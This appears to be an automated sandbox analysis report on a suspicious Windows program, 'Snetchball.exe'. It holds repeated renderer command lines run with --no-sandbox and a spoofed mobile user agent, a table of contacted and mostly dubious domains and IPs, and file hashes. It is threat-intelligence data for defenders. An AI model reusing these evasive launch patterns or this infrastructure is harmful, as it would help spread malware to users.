"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=138 --mojo-platform-channel-handle=1220 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=139 --mojo-platform-channel-handle=4396 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=140 --mojo-platform-channel-handle=4528 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=141 --mojo-platform-channel-handle=2580 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=142 --mojo-platform-channel-handle=1276 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=143 --mojo-platform-channel-handle=1964 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=144 --mojo-platform-channel-handle=4524 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=145 --mojo-platform-channel-handle=3844 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=146 --mojo-platform-channel-handle=3164 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=147 --mojo-platform-channel-handle=4316 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=148 --mojo-platform-channel-handle=4256 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=149 --mojo-platform-channel-handle=4356 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=150 --mojo-platform-channel-handle=4260 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=151 --mojo-platform-channel-handle=4148 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=152 --mojo-platform-channel-handle=2400 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=153 --mojo-platform-channel-handle=4108 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=154 --mojo-platform-channel-handle=4056 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=155 --mojo-platform-channel-handle=1280 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=156 --mojo-platform-channel-handle=4432 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=157 --mojo-platform-channel-handle=4396 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=158 --mojo-platform-channel-handle=3660 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ify.ac | udp |
| US | 8.8.8.8:53 | ify.ac | udp |
| US | 172.67.211.171:443 | ify.ac | tcp |
| US | 104.21.20.211:443 | nxt-psh.com | tcp |
| RU | 93.158.134.119:443 | mc.yandex.ru | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.20.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.134.158.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 104.21.67.200:443 | soneremonasez.shop | tcp |
| US | 104.21.67.200:443 | soneremonasez.shop | tcp |
| GB | 142.250.200.46:443 | google.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| GB | 142.250.200.46:443 | google.com | udp |
| US | 104.21.70.174:443 | senzamenuzaes.shop | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| RU | 213.180.204.221:443 | clck.ru | tcp |
| RU | 213.180.204.232:443 | sba.yandex.ru | tcp |
| US | 104.26.8.202:443 | grabify.link | tcp |
| GB | 162.125.64.18:443 | www.dropbox.com | tcp |
| RU | 213.180.204.221:443 | clck.ru | tcp |
| RU | 213.180.204.221:443 | clck.ru | tcp |
| RU | 213.180.204.221:443 | clck.ru | tcp |
| RU | 213.180.204.221:443 | clck.ru | tcp |
| RU | 87.250.250.145:443 | adfstat.yandex.ru | tcp |
| RU | 93.158.134.158:443 | captcha-backgrounds.s3.yandex.net | tcp |
| RU | 178.154.131.217:443 | yastatic.net | tcp |
| RU | 178.154.131.217:443 | yastatic.net | tcp |
| RU | 178.154.131.217:443 | yastatic.net | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.73.21:443 | z3n.mom | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| NL | 185.26.182.111:443 | features.opera-api2.com | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| RU | 95.163.241.63:80 | 95.163.241.63 | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.27.244:443 | stockframe.site | tcp |
| SE | 185.117.88.231:80 | bobisawinner.xyz | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| SE | 185.117.88.231:80 | bobisawinner.xyz | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| NL | 185.26.182.124:443 | autoupdate.geo.opera.com | tcp |
| NL | 185.26.182.124:443 | autoupdate.geo.opera.com | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| NL | 185.26.182.111:443 | features.opera-api2.com | tcp |
| NL | 82.145.216.23:443 | download.opera.com | tcp |
| US | 104.18.10.89:443 | download5.operacdn.com | tcp |
| US | 8.8.8.8:53 | 89.10.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.217.145.82.in-addr.arpa | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| GB | 2.17.209.124:443 | download3.operacdn.com | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 234.212.58.216.in-addr.arpa | udp |
| GB | 216.58.201.99:80 | o.pki.goog | tcp |
| GB | 216.58.201.99:80 | o.pki.goog | tcp |
| GB | 142.250.200.14:443 | clients2.google.com | tcp |
| GB | 142.250.187.225:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | 89.242.123.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.187.250.142.in-addr.arpa | udp |
| GB | 142.250.200.14:443 | clients2.google.com | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 44.237.52.63:80 | api.check-data.xyz | tcp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| US | 8.8.8.8:53 | secondappad.me | udp |
| US | 8.8.8.8:53 | secondappad.me | udp |
| DE | 88.99.166.117:80 | secondappad.me | tcp |
| US | 8.8.8.8:53 | cleansix.xyz | udp |
| US | 8.8.8.8:53 | cleansix.xyz | udp |
| US | 8.8.8.8:53 | cleansix.xyz | udp |
| US | 8.8.8.8:53 | cleansix.xyz | udp |
| US | 172.67.175.236:443 | cleansix.xyz | udp |
| US | 172.67.175.236:443 | cleansix.xyz | tcp |
| US | 172.67.175.236:443 | cleansix.xyz | udp |
| US | 8.8.8.8:53 | 236.175.67.172.in-addr.arpa | udp |
| HK | 141.98.234.31:53 | cspgesw.net | udp |
| US | 8.8.8.8:53 | 31.234.98.141.in-addr.arpa | udp |
| LT | 94.156.8.80:80 | cspgesw.net | tcp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.4.4:443 | dns.google | tcp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| SE | 185.117.88.39:80 | sup4tsk.biz | tcp |
| US | 8.8.8.8:53 | resulteachfoundation.pro | udp |
| US | 8.8.8.8:53 | resulteachfoundation.pro | udp |
| US | 172.67.73.190:443 | resulteachfoundation.pro | tcp |
| US | 8.8.8.8:53 | 190.73.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.4.4:443 | dns.google | tcp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 44.237.52.63:443 | api5.check-data.xyz | tcp |
| KZ | 185.22.66.15:80 | www.rapidfilestorage.com | tcp |
| KZ | 185.22.66.15:80 | www.rapidfilestorage.com | tcp |
| US | 8.8.8.8:53 | 106.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.66.22.185.in-addr.arpa | udp |
| RU | 80.78.240.92:80 | rfiles3.tracemonitors.com | tcp |
| RU | 80.78.240.92:443 | rfiles3.tracemonitors.com | tcp |
| RU | 80.78.240.92:443 | rfiles3.tracemonitors.com | tcp |
| LT | 94.156.8.80:80 | cspgesw.net | tcp |
| US | 8.8.8.8:443 | dns.google | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 6f3725d32588dca62fb31e116345b5eb |
| SHA1 | 0229732ae5923f45de70e234bae88023521a9611 |
| SHA256 | b81d7e414b2b2d039d3901709a7b8d2f2f27133833ecf80488ba16991ce81140 |
| SHA512 | 31bacf4f376c5bad364889a16f8ac61e5881c8e45b610cc0c21aa88453644524525fd4ccf85a87f73c0565c072af857e33acffbbca952df92fedddd21f169325 |
\??\pipe\LOCAL\crashpad_2808_NZYQWBOAHINRJYYL
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
